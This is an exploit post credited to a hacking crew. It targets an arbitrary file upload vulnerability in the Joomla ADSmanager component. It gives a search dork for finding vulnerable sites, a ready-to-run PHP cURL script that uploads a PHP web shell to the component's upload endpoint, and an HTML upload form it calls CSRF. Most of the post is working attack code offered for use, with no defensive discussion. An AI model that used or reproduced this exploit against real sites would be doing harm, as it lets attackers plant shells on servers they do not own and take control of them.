Assalamuallaikum Wr.Wb
# MrXerovhincs - Extreme Crew
# Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
# Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
# Date: 06/07/2015 : time : 04:42 Morning
# Exploit Author: Back-DOOR
# Vendor Homepage: www.joomprod.com
# Contact me On My page : fb.com/BaCkDoOr.HaCkInG
# contact me on my account : fb.com/Backdoor.ma
# Software Link: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0CCUQFjAB&url=http%3A%2F%2Fextensions.joomla.org%2Fextension%2Fadsmanager&ei=hAqaVfn7O8vkUpnegcAO&usg=AFQjCNEe0pi8_ZkBXs0zd_0JqLEGTNsiXw&sig2=eD1ulkdARbhMjkDddmsjFQ
# Tested on: Kali linux
# Vulnerable File : /index.php?option=com_adsmanager&task=upload&tmpl=component
# Exploit :
<?php
$url = "blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
# CSRF :
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Refrensi : http://www.exploit4arab.net
